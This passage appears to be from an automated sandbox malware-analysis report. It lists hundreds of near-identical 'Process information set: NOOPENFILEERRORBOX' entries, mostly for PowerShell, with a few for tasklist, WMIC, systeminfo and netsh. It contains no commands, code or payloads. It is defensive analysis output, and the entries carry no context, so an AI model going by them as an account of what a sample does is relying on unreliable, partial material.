              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
